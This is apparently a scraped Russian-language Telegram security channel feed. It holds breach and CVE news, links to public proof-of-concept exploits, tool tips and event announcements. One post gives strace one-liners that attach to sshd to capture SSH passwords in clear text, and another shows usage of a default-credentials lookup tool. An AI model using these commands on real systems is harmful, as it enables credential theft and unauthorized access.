SecuriXy.kz
9.36K subscribers
483 photos
22 videos
18 files
393 links
Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz

Обратная связь - @feedback_securixy_bot

Хахатушки - @memekatz
Hack the Box RUS - @HTB_RUS
Download Telegram
Forwarded from T.Hunter
#news Будете смеяться, но LastPass опять подвергся взлому. В августе злоумышленники стянули их исходники и техдокументацию, а теперь получили доступ к стороннему облачному хранилищу, используя украденную ранее инфу. Ну а в хранилище, как водится, пользовательские данные.

Компания пока не спешит делиться подробностями, скрываясь за размытой формулировкой «‎определённые элементы пользовательской информации». Так что масштабы утечки станут ясны позднее. Как обычно, заверяют, что пароли в безопасности – у нас всё зашифровано и архитектура нулевого разглашения, все дела. Пароль-то, может, и последний, а вот взлом оказался совсем не последним.

@tomhunter
Вышел Sysmon 14.13 (закрыта #CVE-2022-41120 CVSS:3.1 7.8/6.8).
🔗 https://techcommunity.microsoft.com/t5/sysinternals-blog/active-directory-explorer-v1-52-contig-v1-82-and-sysmon-v14-13/ba-p/3685500

Поторопитесь ибо PoC так же вышел!
Here is #PoC for CVE-2022-41120 https://t.co/oXkBYi4bWk. I combined arb file delete and limited arb file write to get code execution as NT Authority\System.
🔗 https://github.com/Wh04m1001/SysmonEoP
Новость бударажущая ум и представление о безопасности Linux*
Так сказать мир был до этой новости и теперь…

Получаем пароль от SSH в открытом виде
1. получаем точный идентификатор sshd

pgrep -l sshd

2. Отслеживаем системные вызовы

strace -f -p <ssh_PID> -e trace=write -o capture

Ну или одной строкой

strace -f -p $(service sshd status |grep PID|awk "{print \$3}") -e trace=write -o capture

Для танкистов - смотрите вывод

cat capture


А еще более печально, есть тула
https://github.com/ncsa/ssh-auditor

#ssh #sniff #password
Удобный сборник дефолтных кред с поисковиком
https://github.com/ihebski/DefaultCreds-cheat-sheet

Istallation oneliner:

git clone https://github.com/ihebski/DefaultCreds-cheat-sheet.git; cd DefaultCreds-cheat-sheet; pip3 install .


Usage guide:

#update DB
creds update

#Search by vendor
creds search tomcat

#Export by vendor
creds search tomcat export
Forwarded from MLNK.BLOG
Вытащить вложение из письма. 📧
Тут нам поможет утилла maildir-utils
sudo apt install maildir-utils
В ней зашито пару прикольных скриптов которые облегчают жизнь при анализе э-майлов.
add - add message to database
cfind - find a contact
extract - extract parts/attachments from messages
fields - show table of all query fields and flags
find - query the message database
help - get help
index - index messages
init - init the mu database
mkdir - create a maildir
remove - remove a message from the database
script - run a script (available only when mu was built with guile-support)
server - start mu server
verify - verify signatures of a message
view - view a specific message


нам понадобится extract
mu extract /home/mlnk/susps/susp-mail.eml --save-all
(имеется небольшой баг, поэтому путь к файлу должен быть абсолютным)
Теперь все части нашего письма сохранины в отдельные файлы и мы можем продолжить анализ вложений.

Всем 🦫, а 🌎 Миру — мир!

#mail #analysis
Наглядный пример, что никогда не стоит открывать на весь мир админку управления хоть NGFW, хоть WAF, хоть что либо ещё... И естественно нужно вовремя ставить патчи и обновления.
Forwarded from APT
💥 Fortinet FortiNAC Unauthenticated RCE

On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.

PoC:
https://github.com/horizon3ai/CVE-2022-39952

Research:
https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/

#fortinet #fortinac #rce #cve
Удобняха для сортировки вывода сканера nuclei по хостам

https://github.com/DingyShark/nuclei-scan-sort
Forwarded from Codeby
👩‍💻 За кулисами Red Team. Интересные ситуации в проектах.

Друзья, рады вам сообщить, что уже в эту субботу, 1 апреля, мы проведём наш первый стрим в этом году!

Мы пригласили экспертов информационной безопасности, которые поделятся опытом работы в Red Team и расскажут о самых интересных и необычных ситуациях, с которыми они сталкивались в проектах по тестированию на проникновение. Вы узнаете, как они решают проблемы и справляются с непредсказуемыми ситуациями в процессе работы.

🌟 У нас в гостях:

🔹 @T3m3t_N0sc3 – гуру инфраструктурных пентестов и автор множества статей по Red Team;

🔹 @clevergod – вице-капитан команды Кодебай с колоссальным опытом в ред тим проектах;

🔹 @Riocool – основатель группы единомышленников RedTeam Brazzers;

🔹 @Acrono – создатель группы Telegram APT и автор нескольких CVE для Windows.

🎤 И, конечно же, ваш незаменимый ведущий – @puni1337!

Мы ждем вас 1 апреля в 17:00 по московскому времени!

🌐 Смотрите стрим в нашем Youtube канале

#pentest #redteam #stream
Please open Telegram to view this post
VIEW IN TELEGRAM
Нейросеть смогла моментально взломать половину паролей или Пора создавать HydraGPT...

Компания Home Security Heroes опубликовала исследование, в котором указала, что новейший генеративный инструмент на основе искусственного интеллекта для взлома паролей PassGAN научился моментально взламывать каждый второй пароль.
«PassGAN на основе ИИ смог взломать 51% паролей менее чем за одну минуту, 65% — менее чем за час, 71% — менее чем за день и 81% — менее чем за месяц», — сообщают разработчики.
В исследовании Home Security Heroes указано, что PassGAN содержит в себе более чем 15 миллионов учётных данных пользователей сети со всего мира.

https://9to5mac.com/2023/04/07/ai-cracks-passwords-this-fast-how-to-protect/
Forwarded from b4tr_ch
Компания Microsoft запустила новый инструмент искусственного интеллекта (ИИ) под названием Security Copilot, который использует технологию GPT-4 для поиска уязвимостей в коде и помощи инженерам в обеспечении безопасности программного обеспечения.

В своей статье в блоге Microsoft объясняет, что Security Copilot может помочь инженерам быстро находить потенциальные проблемы безопасности, которые могут быть использованы злоумышленниками. Инструмент использует комплексную технологию машинного обучения, которая позволяет быстро анализировать код и предлагать рекомендации по устранению уязвимостей.

Microsoft также отмечает, что Security Copilot может помочь инженерам, не имеющим опыта в области безопасности программного обеспечения, быстро находить потенциальные проблемы безопасности. Это может быть полезно для компаний, которые не могут позволить себе нанять профессионала в области безопасности.

Security Copilot также имеет функцию обратной связи, которая позволяет инженерам сообщать об ошибках и улучшениях. Это поможет Microsoft сделать инструмент еще более эффективным в борьбе с уязвимостями в коде.

p.s. сам пользуюсь Copilot и очень доволен ☺️
Forwarded from Codeby
🆘 Важное напоминание!

Завтра, 20 апреля, в 09:00 ЗАКАНЧИВАЕТСЯ РЕГИСТРАЦИЯ на CTF-соревнования "Игры Кодебай". Это последний шанс присоединиться к увлекательному мероприятию и продемонстрировать свои навыки!

Старт соревнований 20 апреля в 10:00 по мск

➡️ Не упустите свою возможность и зарегистрируйтесь прямо сейчас! Удачи в соревнованиях!
Please open Telegram to view this post
VIEW IN TELEGRAM
Кажется что-то пошло не так...
Forwarded from Hackers at Standoff 11 (Kseniya Kravtsova)
🎉 Final scoreboard

Congratulations, guys! We were happy to meet your teams. Hope to see you on the next Standoff!

❗️Просьба все команды из топ-10, если вы на площадке в Парке, подойти в 18:30 ко мне около макета, вручу вам подарки. С остальными свяжусь я и Карина на неделе — отправим на нужный вам адрес.